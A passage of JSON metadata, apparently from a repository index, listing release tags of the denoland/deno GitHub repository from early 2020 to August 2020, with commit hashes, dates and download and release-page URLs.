c705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974